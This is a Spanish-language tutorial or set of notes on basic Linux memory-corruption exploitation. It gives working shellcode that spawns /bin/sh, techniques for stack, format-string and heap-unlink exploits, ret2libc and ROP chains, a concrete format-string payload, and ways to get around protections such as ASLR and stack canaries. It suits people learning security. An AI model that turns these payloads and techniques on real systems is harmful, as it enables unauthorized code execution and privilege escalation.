# Linux Exploiting \(Basic\) \(SPA\)

## **ASLR**

Aleatorización de direcciones

**Desactiva aleatorizacion\(ASLR\) GLOBAL \(root\)**:  
echo 0 &gt; /proc/sys/kernel/randomize\_va\_space  
Reactivar aletorizacion GLOBAL: echo 2 &gt; /proc/sys/kernel/randomize\_va\_space

**Desactivar para una ejecución** \(no requiere root\):  
setarch \`arch\` -R ./ejemplo argumentos  
setarch \`uname -m\` -R ./ejemplo argumentos

**Desactivar protección de ejecución en pila**  
gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo

**Core file**  
ulimit -c unlimited  
gdb /exec core\_file  
/etc/security/limits.conf -&gt; \*               soft    core            unlimited

**Text  
Data  
BSS  
Heap**

**Stack**

## **1.STACK OVERFLOWS**

> buffer overflow, buffer overrun, stack overrun, stack smashing

Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.

**Sección BSS**: Variables globales o estáticas sin inicializar

```text
static int i;
```

**Sección DATA**: Variables globales o estáticas inicializadas

```text
int i = 5;
```

**Sección TEXT**: Instrucciones del código \(opcodes\)

**Sección HEAP**: Buffer reservados de forma dinánima \(malloc\(\), calloc\(\), realloc\(\) \)

**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)

Para obtener la dirección de una función dentro de un programa se puede hacer:

```text
objdump -d ./PROGRAMA | grep FUNCION
```

## **2.SHELLCODE**

Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h \| grep “\_\_NR\_”

setreuid\(0,0\); // \_\_NR\_setreuid 70  
execve\(“/bin/sh”, args\[\], NULL\); // \_\_NR\_execve 11  
exit\(0\); // \_\_NR\_exit 1

xor eax, eax ; limpiamos eax  
xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar  
mov al, 0x01 ; eax = 1 —&gt; \_\_NR\_exit 1  
int 0x80 ;        Ejecutar syscall

**nasm -f elf assembly.asm** —&gt; Nos devuelve un .o  
**ld assembly.o -o shellcodeout** —&gt; Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump  
objdump -d  -Mintel ./shellcodeout** —&gt; Para ver que efectivamente es nuestra shellcode y sacar los OpCodes

**Comprobar que la shellcode funciona**

```text
char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80”

void main(){
            void (*fp) (void);
            fp = (void *)shellcode;
            fp();
}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1">​</span>
```

Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO**

A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código.

EJ **TRUCO \(/bin/sh\)**:

```text
jmp                 0x1f                                        ; Salto al último call
popl                %esi                                       ; Guardamos en ese la dirección al string
movl               %esi, 0x8(%esi)       ; Concatenar dos veces el string (en este caso /bin/sh)
xorl                 %eax, %eax             ; eax = NULL
movb  %eax, 0x7(%esi)     ; Ponemos un NULL al final del primer /bin/sh
movl               %eax, 0xc(%esi)      ; Ponemos un NULL al final del segundo /bin/sh
movl   $0xb, %eax               ; Syscall 11
movl               %esi, %ebx               ; arg1=“/bin/sh”
leal                 0x8(%esi), %ecx      ; arg[2] = {“/bin/sh”, “0”}
leal                 0xc(%esi), %edx      ; arg3 = NULL
int                    $0x80                         ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL)
xorl                 %ebx, %ebx             ; ebx = NULL
movl   %ebx, %eax            
inc                   %eax                          ; Syscall 1
int                    $0x80                         ; exit(0)
call                  -0x24                          ; Salto a la primera instrución
.string             \”/bin/sh\”                               ; String a usar<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1">​</span>
```

**EJ usando el Stack\(/bin/sh\):**  


```text
section .text
global _start
_start:
xor                  eax, eax                     ;Limpieza
mov                al, 0x46                      ; Syscall 70
xor                  ebx, ebx                     ; arg1 = 0
xor                  ecx, ecx                     ; arg2 = 0
int                    0x80                           ; setreuid(0,0)
xor                  eax, eax                     ; eax = 0
push   eax                             ; “\0”
push               dword 0x68732f2f ; “//sh”
push               dword 0x6e69622f; “/bin”
mov                ebx, esp                     ; arg1 = “/bin//sh\0”
push               eax                             ; Null -> args[1]
push               ebx                             ; “/bin/sh\0” -> args[0]
mov                ecx, esp                     ; arg2 = args[]
mov                al, 0x0b                      ; Syscall 11
int                    0x80                           ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL)
```

**EJ FNSTENV:**

```text
fabs
fnstenv [esp-0x0c]
pop eax                     ; Guarda el EIP en el que se ejecutó fabs
…
```

**Egg Huter:**

Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada \(busca alguna firma puesta en la shellcode\). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código.

**Shellcodes polimórficos**

Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**:

```text
global _start
_start:
            jmp short magic
init:
            pop     esi
            xor      ecx, ecx
            mov    cl,0                              ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
desc:
            sub     byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
            sub     cl, 1
            jnz       desc
            jmp     short sc
magic:
            call init
sc:
            ;Aquí va el shellcode
```

1.  **Atacando el Frame Pointer \(EBP\)**

Útil en una situación en la que podemos modificar el EBP pero no el EIP.

Se sabe que al salir de una función se ejecuta el siguente código ensamblador:

```text
movl               %ebp, %esp
popl                %ebp
ret
```

De esta forma, si se puede modificar el EBP al salir de una función \(fvuln\) que ha sido llamada por otra función, cuando la función que llamó a fvuln finalice, su EIP puede ser modificado.

En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la direcciónd e la shellcode + 4 \(hay que sumarle 4 por el pop\). Así, al salir de la función, se meterá en ESP el valor de &\(&Shellcode\)+4, con el pop se le restará 4 al ESP y este apuntará a la dirección de la shellcode cuando se ejcute el ret.

**Exploit:**  
&Shellcode + "AAAA" + SHELLCODE + relleno + &\(&Shellcode\)+4

**Off-by-One Exploit**  
Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP.

## **4. Métodos return to Libc**

Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar.

El ASLR provoca que en cada ejecución las funciones se carguen en posiciones distintas de la memoria. Por lo tanto este método puede no ser efectivo en ese caso. Para servidores remotos, como el programa está siendo ejecutado constantemente en la misma dirección sí puede ser útil.

* **cdecl\(C declaration\)** Mete los argumentos en el stack y tras salir de la función limpia la pila
* **stdcall\(standard call\)** Mete los argumentos en la pila y es la función llamada la que la limpia
* **fastcall** Mete los dos primeros argumentos en registros y el resto en la pila

Se pone la dirección de la instrucción system de libc y se le pasa como argumento el string “/bin/sh”, normalmente desde una variable de entorno. Además, se usa la dirección a la función exit para que una vez que no se requiera más la shell, salga el programa sin dar problemas \(y escribir logs\).

**export SHELL=/bin/sh**

Para encontrar las direcciones que necesitaremos se puede mirar dentro de **GDB:  
p system  
p exit  
rabin2 -i ejecutable** —&gt; Da la dirección de todas las funciones que usa el programa al cargarse  
\(Dentro de un start o algun breakpoint\): **x/500s $esp** —&gt; Buscamos dentro de aqui el string /bin/sh

Una vez tengamos estas direcciones el **exploit** quedaría:

“A” \* DISTANCIA EBP + 4 \(EBP: pueden ser 4 "A"s aunque mejor si es el EBP real para evitar fallos de segmentación\) + Dirección de **system** \(sobreescribirá el EIP\) + Dirección de **exit** \(al salir de system\(“/bin/sh”\) se llamará a esta función pues los primero 4bytes del stack son tratados como la siguiente dirección del EIP a ejecutar\) + Dirección de “**/bin/sh**” \(será el parámetro pasado a system\)

De esta forma el EIP se sobreescribirá con la dirección de system la cual recibirá como parámetro el string “/bin/sh” y al salir de este ejecutará la función exit\(\).

Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio \(\x20\). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente \(por ejemplo con &gt; x/8i system-4\).

Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP**  a la que volver.

Una técnica interesante con este método es el llamar a **strncpy\(\)** para mover un payload del stack al heap y posteriormente usar **gets\(\)** para ejecutar dicho payload.

Otra técnica interesante es el uso de **mprotect\(\)** la cual permite asignar los permisos deseados a cualquier parte de la memoria. Sirve o servía en BDS, MacOS y OpenBSD, pero no en linux\(controla que no se puedan otorgar a la vez permisos de escritura y ejecución\). Con este ataque se podría volver a configurar la pila como ejecutable.

#### **Encadenamiento de funciones**

Basándonos en la técnica anterior, esta forma de exploit consiste en:  
Relleno + &Función1 + &pop;ret; + &arg\_fun1 + &Función2 + &pop;ret; + &arg\_fun2 + …

De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios \(ej 4\) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —&gt; **objdump -d ejecutable**

#### **Encadenamiento mediante falseo de frames \(encadenamiento de EBPs\)**

Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret"

RELLENO  
+ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\)  
+ En el EIP ponemos de dirección una función &\(leave;ret\)

Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh”

el 2ºEBP sería: 3ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/ls”

Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria.

\(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib\)

## **5.Métodos complementarios**

#### **Ret2Ret**

Útil para cuando no se puede meter una dirección del stack en el EIP \(se comprueba que el EIP no contenga 0xbf\) o cuando no se puede calcular la ubicación de la shellcode. Pero, la función vulnerable acepte un parámetro \(la shellcode irá aquí\).

De esta forma, al cambiar el EIP por una dirección a un **ret**, se cargará la siguiente dirección \(que es la dirección del primer argumento de la función\). Es decir, se cargará la shellcode.

El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguientes bytes de la pila apuntan al inicio de la shellcode pues se mete en el stack la dirección al parámetro pasado\)

Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere.

            **Ret2PopRet**

Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos.

#### **Técnica de Murat**

En linux todos los progamas se mapean comenzando en 0xbfffffff

Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen\(NOMBRE\_ejecutable\_completo\) - strlen\(shellcode\)

De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode.

Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen

#### **Jump to ESP: Windows Style**

Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode.

En caso de que no se tenga el ASLR activo en Windows o Linux se puede llamar a **jmp esp** o **call esp** almacenadas en algún objeto compartido. En caso de que esté el ASLR, se podría buscar dentro del propio programa vulnerable.

Además, el hecho de poder colocar la shellcode después de la corrupción del EIP en vez de en medio del stack, permite que las instrucciones push o pop que se ejecuten en medio de la función no lleguen a tocar la shellcode \(cosa que podría ocurrir en caso de ponerse en medio del stack de la función\).

De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax \(ret2eax\).**

#### **ROP \(Return Oriented Programming\) o borrowed code chunks**

Los trozos de código que se invocan se conocen como gadgets.

Esta técnica consiste en encadenar distintas llamadas a funciones mediante la técnica de **ret2libc** y el uso de **pop,ret**.

En algunas arquitecturas de procesadores cada instrucción es un conjunto de 32bits \(MIPS por ej\). Sin embargo, en Intel las instrucciones son de tamaño variable y varias instrucciones pueden compartir un conjunto de bits, por ejemplo:

**movl $0xe4ff, -0x\(%ebp\)** —&gt; Contiene los bytes 0xffe4 que también se traducen por: **jmp \*%esp**

De esta forma se pueden ejecutar algunas instrucciones que realmente ni si quiera está en el programa original

**ROPgadget.py** nos ayuda a encontrar valores en binarios

Este programa también sirve para crear los **payloads**. Le puedes dar la librería de la que quieres sacar los ROPs y él generará un payload en python al cual tu le das la dirección en la que está dicha librería y el payload ya está listo para ser usado como shellcode. Además, como usa llamadas al sistema no ejecuta realmente nada en el stack sino que solo va guardando direcciones de ROPs que se ejecutarán mediante **ret**. Para usar este payload hay que llamar al payload mediante una instrucción **ret**.

#### **Integer overflows**

Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo:

```text
#include <stdion.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
int len;
unsigned int l;
char buffer[256];
int i;
len = l = strtoul(argv[1], NULL, 10);
printf(“\nL = %u\n”, l);
printf(“\nLEN = %d\n”, len);
if (len >= 256){
printf(“\nLongitus excesiva\n”);
exit(1);
}
if(strlen(argv[2]) < l)
strcpy(buffer, argv[2]);
else
printf(“\nIntento de hack\n”);
return 0;
}
```

En el ejemplo anterior vemos que el programa se espera 2 parámetros. El primero la longitud de la siguiente cadena y el segundo la cadena.

Si le pasamos como primer parámetro un número negativo saldrá que len &lt; 256 y pasaremos ese filtro, y además también strlen\(buffer\) será menor que l, pues l es unsigned int y será muy grande.

Este tipo de overflows no busca lograr escribir algo en el proceso del programa, sino superar filtros mal diseñados para explotar otras vulnerabilidades.

#### **Variables no inicializadas**

No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante.

## **6.Explotando format strings**

Cuando se llama a printf se ponen los parámetros de forma ordenada.

%08x —&gt; 8 bytes hexadecimales  
%d —&gt; Entero  
%u —&gt; Entero sin signo  
%s —&gt; Cadena  
%n —&gt; Bytes escritos  
%hn —&gt; Ocupa 2 bytes en vez de 4  
&lt;n&gt;$X —&gt; Parámetro de acceso directo —&gt; \(“%3$d”, var1, var2, var3\) —&gt; Accede directamente a var3

AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.  
AAAA.%4\$x —&gt; 4º parametro  
AAAA%.6000x%4\$n —&gt; Se escribe 6004 en la dirección que apunta el 4º parametro  
AAAA%6000d%4\$n —&gt; Se escribe 6004 en la dirección que apunta el 4º parametro  
AAAA.%500\$08x —&gt; Parámetro en el offset 500

**objdump -t ./exec \| grep varBss  
objdump -TR ./exec \| grep exit\(func lib\)  
objdump -d ./exec \| grep funcCode  
objdump -D ./exec \| grep "VAR\_NAME"** --&gt; Direccion de memoria donde se carga una variable stática \(en la region DATA\)

Con %n escribimos el número bytes escritos y normalmente podremos controlar dónde, si por ejemplo queremos escribir el valor 400 en una dirección que es el 8º parámetro:

python -c ‘print “DIRECCION” ’%.396d%8\$n

#### **DTOR**

Los destructores son funciones que se ejecutan justo antes de la finalización de un programa.

**objdump -s -j .dtors /exec  
rabin -s /exec \| grep “\_\_DTOR”**

Si se logra escribir algo en \_\_DTOR\_END\_\_ la dirección de una shellcode, esta se ejecutará a la salida del programa.

Los DTOR se encuentran entre los valores ffffffff y 00000000, por lo que si no hay ningún DTOR encontraremos al ejecutar el **objdump** esos valores seguidos. Entonces, si introducimos una valor entre ambos, será tomado como lla dirección de una función y se ejecutará \(es decir, hay que sobreescribir el 00000000\).

Es raro que hoy en día un binario tenga DTORs.

#### **GOT \(Tabla de offsets global\) - Mejor esta que la anterior si se puede elegir**

Contiene las direcciones absolutas de las funciones que son utilizadas en un programa.

**objdump -s -j .got ./exec  
\(peda\)&gt; x/20x 0xDIR\_GOT** --&gt; Se ve una lista con las direcciones de las funciones  
**\(peda\)&gt; x/i 0xDIR\_FUNC\_GOT** --&gt; Veríamos el inicio de una función \(probablemente un push ebp\)

#### **Exploit \(format strings\)**

Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit.

Para escribir la dirección de una shellcode normalmente hay que escribirla en dos pasos, primero 2 bytes y luego los otros 2, para ello se usa $hn.

HOB —&gt; 2bytes superiores de la dirección de la shellcode  
LOB —&gt; 2bytes inferiores de la dirección de la shellcode

Hay que escribir siempre primero el menor de \[HOB, LOB\] y luego el otro.

Si HOB &lt; LOB  
\[dirección+2\]\[direccion\]%.\[HOB-8\]x%\[offset\]\$hn%.\[LOB-HOB\]x%\[offset+1\]

Si HOB &gt; LOB  
\[dirección+2\]\[direccion\]%.\[LOB-8\]x%\[offset+1\]\$hn%.\[HOB-LOB\]x%\[offset\]

HOB                                       LOB                            HOB\_shellcode-8        NºParam\_dir\_HOB      LOB\_shell-HOB\_shell         NºParam\_dir\_LOB

\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+         "%.49143x"        +       "%4$hn"          +          "%.15408x"                +          "%5$hn"'\`

#### **Format Strings como Buffer Overflows**

La función **sprintf** copia a un string \(char \*str\) lo mismo que se le pasaría a una función printf. Es decir, si no tiene en cuenta el formato \(“%s”\), y el string introducido es dominado por el atacante, se puede introducir una cadena como %.44xAAAA —&gt; Que hará escribir 44bytes +”AAAA” en \*str y eso puede provocar un bufferoverflow.

#### **Estructuras \_\_atexit \(ya no útil en general\)**

atexit\(\) es una función a la cuál se le pasan como parámetros otras funciones y estas funciones se ejecutarán al ejecutarse un exit\(\) o el return del main.

Si se consigue modificar la dirección de alguna de estas funciones para que apunte a un shellcode se ganaría el control del proceso, pero actualmente esto es más complicado.

Actualmente las direcciones a las funciones que hay que ejecutar se esconden tras varias estructuras  y finalmente la dirección a la que apunta no son las direcciones de las funciones, sino que están cifradas con XOR y desplazamientos con una clave aleatoria. Por lo que actualmente este vector de ataque no es de mucha utilidad por lo menos en x86 y x64\_86. La función de cifrado es PTR\_MANGLE.

Otras arquitecturas como m68k, mips32, mips64, aarch64, arm, hppa… No implementas la función de cifrado pues que esta devuelve lo mismo que recibió como entrada. Así que estas arquitectura sí serían atacables mediante este vector.

#### **setjmp\(\) y longjmp\(\) \(ya no útil en general\)**

Setjmp\(\) permite guardar el contexto \(los registros\)

longjmp\(\) permite restablecer el contexto

Los registros guardados son: EBX, ESI, EDI, ESP, EIP, EBP

Lo que pasa es que EIP y ESP son pasados por la función PTR\_MANGLE, por lo que las arquitectura vulnerables a este ataque son las mismas que las anteriores.

Son útiles para recuperación de errores o interrupciones.

Sin embargo, según lo leído, no se protegen los demás registros, por lo que si dentro de la función a la que se llame hay un call ebx, call esi o call edi se puede tomar el control. O también se podría modificar EBP para modificar el ESP.

#### **VTable y VPTR en C++**

Cada clase tiene una Vtable que es un array de punteros a métodos.

Cada objeto de una clase tiene un VPtr que es un puntero a la Viable de su clase. El VPtr forma parte de la cabecera de cada objeto, por lo que si se logra una sobreescritura del VPtr se podría modificar para que apuntase a una Viable falsa para que al ejecutar una función se fuese a la shellcode.

## **Medidas preventivas y evasiones**

#### **ASLR no tan aleatorio**

PaX dive el espacio de direcciones del proceso en 3 grupos:

Codigo y datos iniciados y no iniciados: .text, .data y .bss —&gt; 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales

Memoria asignada por mmap\(\) y libraries compartidas —&gt; 16bits, delta\_mmap

El stack —&gt; 24bits, delta\_stack —&gt; Realmente 11 \(del byte 10º al 20º inclusive\) —&gt;alineado a 16bytes —&gt; 524.288 posibles direcciones reales del stack

Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack.

**Return-into-printf**

Es una técnica para convertir un buffer overflow en un error de cadena de formato. Consiste en sustituir el EIP para que apunte a un printf de la función y pasarle como argumento una cadena de formato manipulada para obtener valores sobre el estado del proceso.

**Ataque a librerías**

Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork\(\) el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep\(\) de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás.

La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta.

#### **StackGuard y StackShield**

**StackGuard** inserta antes del EIP —&gt; 0x000aff0d\(null, \n, EndOfFile\(EOF\), \r\) —&gt; Siguen siendo vulnerables recv\(\), memcpy\(\), read\(\), bcoy\(\) y no protege el EBP

**StackShield** es más elaborado que StackGuard

Guarda en una tabla \(Global Return Stack\) todas las direcciones EIP de vuelta de forma que el overflow no cause ningún daño. Ademas, se pueden comparar ambas direcciones para a ver si ha habido un desbordamiento.

También se puede comprobar la dirección de retorno con un valor límite, así si el EIP se va a un sitio distinto del habitual como el espacio de datos se sabrá. Pero esto se sortea con Ret-to-lib, ROPs o ret2ret.

Como se puede ver stackshield tampoco protege las variables locales.

#### **Stack Smash Protector \(ProPolice\) -fstack-protector**

Se pone el canary antes del EBP. Reordena las variables locales para que los buffers estén en las posiciones más altas y así no puedan sobreescribir otras variables.

Además, realiza una copia segura de los argumentos pasados encima de la pila \(encima de las vars locales\) y usa estas copias como argumentos.

No puede proteger arrays de menos de 8 elementos ni buffers que formen parte de una estructura del usuario.

El canary es un número random sacado de “/dev/urandom” o sino es 0xff0a0000. Se almacena en TLS\(Thread Local Storage\). Los hilos comparten el mismo espacio de memoria, el TLS es un área que tiene variables globales o estáticas de cada hilo. Sin embargo, en ppio estas son copiadas del proceso padre aunque el proceso hijo podría modificar estos datos sin modificar los del padre ni los de los demás hijos. El problema es que si se usa fork\(\) pero no se crea un nuevo canario, entonces todos los procesos \(padre e hijos\) usan el mismo canario. En i386 se almacena en gs:0x14 y en x86\_64 se almacena en fs:0x28

Esta protección localiza funciones que tengan buffer que puedan ser atacados e incluye en ellas código al ppio de la función para colocar el canario y código al final para comprobarlo.

La función fork\(\) realiza una copia exacta del proceso del padre, por eso mismo si un servidor web llama a fork\(\) se puede hacer un ataque de fuerza bruta byte por byte hasta averiguar el canary que se está utilizando.

Si se usa la función execve\(\) después de fork\(\), se sobreescribe el espacio y el ataque ya no es posible. vfork\(\) permite ejecutar el proceso hijo sin crear un duplicado hasta que el proceso hijo intentase escribir, entonces sí creaba el duplicado.

#### **Relocation Read-Only \(RELRO\)**

Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT.

Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama.

Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene que situar datos que se deben de cargar cuando se corre el programa.

Lazy binding —&gt; La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla.

Bind now —&gt; Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro**  y  **-z now**

A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles.

**readelf -l /proc/ID\_PROC/exe \| grep BIND\_NOW** —&gt; Para saber si usan el BIND NOW

#### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**

Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.

Por ej:  
char buf\[16\];  
strcpy\(but, source\);

La identifica como insegura y entonces cambia strcpy\(\) por \_\_strcpy\_chk\(\) utilizando el tamaño del buffer como tamaño máximo a copiar.

La diferencia entre **=1**  o **=2** es que:

La segunda no permite que **%n** venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d**

Para mostrar el mensaje de error se usa el argv\[0\], por lo que si se pone en el la dirección de otro sitio \(como una variable global\) el mensaje de error mostrará el contenido de dicha variable. Pag 191

#### **Reemplazo de Libsafe**

Se activa con: LD\_PRELOAD=/lib/libsafe.so.2  
o  
“/lib/libsave.so.2” &gt; /etc/ld.so.preload

Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. \(solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid\).

#### **ASCII Armored Address Space**

Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian.

**ret2plt**

Consiste en realiza un ROP de forma que se llame a la función strcpy@plt \(de la plt\) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar \(system\(\)\). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system\(\)… Al final se llama la dirección guardada en GOT que será system\(\)

**Falso EBP**

Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system\(\) se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”.

#### **Jaulas con chroot\(\)**

debootstrap -arch=i386 hardy  /home/user —&gt; Instala un sistema básico bajo un subdirectorio específico

Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd ..

#### **Instrumentación de código**

Valgrind —&gt; Busca errores  
Memcheck  
RAD \(Return Address Defender\)  
Insure++

## **8 Heap Overflows: Exploits básicos**

**Trozo asignado**

prev\_size      \|  
size                 \|           —Cabecera  
\*mem \| Datos

**Trozo libre**

prev\_size     \|  
size                  \|  
\*fd                   \| Ptr forward chunk  
\*bk                  \| Ptr back chunk       —Cabecera  
\*mem \| Datos

Los trozos libres están en una lista doblemente enlazada \(bin\) y nunca pueden haber dos trozos libres juntos \(se juntan\)

En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap\(\) y si el trozo pertenece al arena primario.

Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink\(\) y se pasa el nuevo trozo más grande a frontlink\(\) para que le inserte el bin adecuado.

unlink\(\){  
BK = P-&gt;bk; —&gt; El BK del nuevo chunk es el que tuviese el que ya estaba libre antes  
FD = P-&gt;fd; —&gt; El FD del nuevo chunk es el que tuviese el que ya estaba libre antes  
FD-&gt;bk = BK; —&gt; El BK del siguiente chunk apunta al nuevo chunk  
BK-&gt;fd = FD; —&gt; El FD del anterior chunk apunta al nuevo chunk  
}

Por lo tanto si conseguimos modificar el P-&gt;bk con la dirección de un shellcode y el P-&gt;fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:

BK = P-&gt;bk = &shellcode  
FD = P-&gt;fd = &\_\_dtor\_end\_\_ - 12  
FD-&gt;bk = BK -&gt; \*\(\(&\_\_dtor\_end\_\_ - 12\) + 12\) = &shellcode

Y así se se ejecuta al salir del programa la shellcode.

Además, la 4º sentencia de unlink\(\) escribe algo y la shellcode tiene que estar reparada para esto:

BK-&gt;fd = FD -&gt; \*\(&shellcode + 8\) = \(&\_\_dtor\_end\_\_ - 12\) —&gt; Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.

Por lo tanto el exploit se crea:

En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.

Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 \(de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre\) y “-4“\(0xfffffffc\) en el size \(para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre\) -&gt; Así cuando free\(\) investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink\(\)**.

